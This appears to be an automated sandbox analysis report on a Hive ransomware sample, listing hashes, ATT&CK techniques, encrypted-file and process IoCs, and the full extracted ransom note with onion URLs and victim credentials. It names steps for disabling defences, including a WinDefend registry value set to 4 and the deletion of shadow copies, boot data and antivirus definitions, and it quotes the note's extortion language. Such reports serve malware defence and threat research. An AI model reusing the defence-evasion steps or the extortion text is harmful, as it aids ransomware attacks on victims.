hive | 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d

Resubmissions

13-01-2022 10:06

220113-l5bblshchm 10

13-01-2022 10:00

220113-l1xdaahca9 10

Analysis

max time kernel
184s
max time network
179s
platform
windows10_x64
resource
win10-en-20211208
submitted
13-01-2022 10:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
Size

3.6MB
MD5

5bd555b0d8e12806fbdbbcc3971b1f67
SHA1

2da4a3e94754c2f94b5f440a68ac0a3b979d3242
SHA256

69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
SHA512

cc3f5199621435a1d04546a7446557378933ab9f42b5b638b8fbdf4805661ac38312d68801dd017fd1665cfe2a5d26c198b2cfd1b0193389c4891bc0e982e13c

Score

10^/10

hive evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\MJZ1_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: 8SsVqN4v45jb Password: ed4GDPLQQh1fpbaGSXhC To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.4ywda files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command-Line Interface

T1059

pid	Process
3820	MpCmdRun.exe

Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1512	bcdedit.exe
1204	bcdedit.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\dust.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_1s.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-100.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\tz_16x11.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaTypewriterBold.ttf.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__IgAAACIAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__KAAAACgAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN102.XML.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__OAAAADgAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\MJZ1_HOW_TO_DECRYPT.txt	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\MJZ1_HOW_TO_DECRYPT.txt	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\MedTile.scale-100.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\SmallTile.scale-100.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-60.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\appuri.ot	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-100.png.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\LoadIcon_contrast-white.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-fullcolor.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\Dismiss.scale-80.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\hu-HU\tipresx.dll.mui	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__BgAAAAYAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashScreen.scale-100_contrast-black.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\SmallTile.scale-125.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__IAAAACAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-40_altform-unplated_contrast-black.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\WideTile.scale-125.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoInternetConnection_120x80.svg.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__CAAAAAgAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\micaut.dll.mui.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-150.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-20_altform-unplated.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__IgAAACIAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\MJZ1_HOW_TO_DECRYPT.txt	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\excel.x-none.msi.16.x-none.tree.dat.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\SplashScreen\PaintSplashScreen.scale-200.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-100.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\dancing.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ng_60x42.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreBadgeLogo.scale-200.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__LgAAAC4AAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__FAAAABQAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Windows Media Player\ja-JP\WMPMediaSharing.dll.mui	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ads_premium.jpg	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\SmallTile.scale-200.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-20_altform-unplated.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-48.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5511_24x24x32.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ul-phn.xrm-ms.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__MAAAADAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OFFSYMSL.TTF.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-60_altform-unplated.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.scale-200.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-200.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-unplated_contrast-black.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotThrow.snippets.ps1xml	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\MJZ1_HOW_TO_DECRYPT.txt	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\he-IL\tipresx.dll.mui	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AgAAAAIAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\MJZ1_HOW_TO_DECRYPT.txt	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\165.png	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2064	vssadmin.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2092	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3936	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
376	powershell.exe
376	powershell.exe
376	powershell.exe
676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1912	wevtutil.exe
Token: SeBackupPrivilege	1912	wevtutil.exe
Token: SeSecurityPrivilege	2572	wevtutil.exe
Token: SeBackupPrivilege	2572	wevtutil.exe
Token: SeSecurityPrivilege	2168	wevtutil.exe
Token: SeBackupPrivilege	2168	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	3720	wmic.exe
Token: SeSecurityPrivilege	3720	wmic.exe
Token: SeTakeOwnershipPrivilege	3720	wmic.exe
Token: SeLoadDriverPrivilege	3720	wmic.exe
Token: SeSystemProfilePrivilege	3720	wmic.exe
Token: SeSystemtimePrivilege	3720	wmic.exe
Token: SeProfSingleProcessPrivilege	3720	wmic.exe
Token: SeIncBasePriorityPrivilege	3720	wmic.exe
Token: SeCreatePagefilePrivilege	3720	wmic.exe
Token: SeBackupPrivilege	3720	wmic.exe
Token: SeRestorePrivilege	3720	wmic.exe
Token: SeShutdownPrivilege	3720	wmic.exe
Token: SeDebugPrivilege	3720	wmic.exe
Token: SeSystemEnvironmentPrivilege	3720	wmic.exe
Token: SeRemoteShutdownPrivilege	3720	wmic.exe
Token: SeUndockPrivilege	3720	wmic.exe
Token: SeManageVolumePrivilege	3720	wmic.exe
Token: 33	3720	wmic.exe
Token: 34	3720	wmic.exe
Token: 35	3720	wmic.exe
Token: 36	3720	wmic.exe
Token: SeIncreaseQuotaPrivilege	3972	wmic.exe
Token: SeSecurityPrivilege	3972	wmic.exe
Token: SeTakeOwnershipPrivilege	3972	wmic.exe
Token: SeLoadDriverPrivilege	3972	wmic.exe
Token: SeSystemProfilePrivilege	3972	wmic.exe
Token: SeSystemtimePrivilege	3972	wmic.exe
Token: SeProfSingleProcessPrivilege	3972	wmic.exe
Token: SeIncBasePriorityPrivilege	3972	wmic.exe
Token: SeCreatePagefilePrivilege	3972	wmic.exe
Token: SeBackupPrivilege	3972	wmic.exe
Token: SeRestorePrivilege	3972	wmic.exe
Token: SeShutdownPrivilege	3972	wmic.exe
Token: SeDebugPrivilege	3972	wmic.exe
Token: SeSystemEnvironmentPrivilege	3972	wmic.exe
Token: SeRemoteShutdownPrivilege	3972	wmic.exe
Token: SeUndockPrivilege	3972	wmic.exe
Token: SeManageVolumePrivilege	3972	wmic.exe
Token: 33	3972	wmic.exe
Token: 34	3972	wmic.exe
Token: 35	3972	wmic.exe
Token: 36	3972	wmic.exe
Token: SeIncreaseQuotaPrivilege	3972	wmic.exe
Token: SeSecurityPrivilege	3972	wmic.exe
Token: SeTakeOwnershipPrivilege	3972	wmic.exe
Token: SeLoadDriverPrivilege	3972	wmic.exe
Token: SeSystemProfilePrivilege	3972	wmic.exe
Token: SeSystemtimePrivilege	3972	wmic.exe
Token: SeProfSingleProcessPrivilege	3972	wmic.exe
Token: SeIncBasePriorityPrivilege	3972	wmic.exe
Token: SeCreatePagefilePrivilege	3972	wmic.exe
Token: SeBackupPrivilege	3972	wmic.exe
Token: SeRestorePrivilege	3972	wmic.exe
Token: SeShutdownPrivilege	3972	wmic.exe
Token: SeDebugPrivilege	3972	wmic.exe
Token: SeSystemEnvironmentPrivilege	3972	wmic.exe
Token: SeRemoteShutdownPrivilege	3972	wmic.exe
Token: SeUndockPrivilege	3972	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 676 wrote to memory of 1280	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	69
PID 676 wrote to memory of 1280	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	69
PID 1280 wrote to memory of 3956	1280	net.exe	71
PID 1280 wrote to memory of 3956	1280	net.exe	71
PID 676 wrote to memory of 3948	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	72
PID 676 wrote to memory of 3948	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	72
PID 3948 wrote to memory of 2356	3948	net.exe	74
PID 3948 wrote to memory of 2356	3948	net.exe	74
PID 676 wrote to memory of 2992	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	75
PID 676 wrote to memory of 2992	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	75
PID 2992 wrote to memory of 3388	2992	net.exe	77
PID 2992 wrote to memory of 3388	2992	net.exe	77
PID 676 wrote to memory of 3812	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	78
PID 676 wrote to memory of 3812	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	78
PID 3812 wrote to memory of 1140	3812	net.exe	80
PID 3812 wrote to memory of 1140	3812	net.exe	80
PID 676 wrote to memory of 3484	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	81
PID 676 wrote to memory of 3484	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	81
PID 3484 wrote to memory of 448	3484	net.exe	83
PID 3484 wrote to memory of 448	3484	net.exe	83
PID 676 wrote to memory of 772	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	84
PID 676 wrote to memory of 772	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	84
PID 772 wrote to memory of 3820	772	net.exe	86
PID 772 wrote to memory of 3820	772	net.exe	86
PID 676 wrote to memory of 2496	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	87
PID 676 wrote to memory of 2496	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	87
PID 2496 wrote to memory of 2728	2496	net.exe	89
PID 2496 wrote to memory of 2728	2496	net.exe	89
PID 676 wrote to memory of 3376	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	90
PID 676 wrote to memory of 3376	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	90
PID 3376 wrote to memory of 1168	3376	net.exe	92
PID 3376 wrote to memory of 1168	3376	net.exe	92
PID 676 wrote to memory of 1232	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	93
PID 676 wrote to memory of 1232	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	93
PID 1232 wrote to memory of 3656	1232	net.exe	95
PID 1232 wrote to memory of 3656	1232	net.exe	95
PID 676 wrote to memory of 3688	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	96
PID 676 wrote to memory of 3688	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	96
PID 676 wrote to memory of 3684	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	98
PID 676 wrote to memory of 3684	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	98
PID 676 wrote to memory of 1424	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	100
PID 676 wrote to memory of 1424	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	100
PID 676 wrote to memory of 860	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	102
PID 676 wrote to memory of 860	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	102
PID 676 wrote to memory of 1064	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	104
PID 676 wrote to memory of 1064	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	104
PID 676 wrote to memory of 3308	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	106
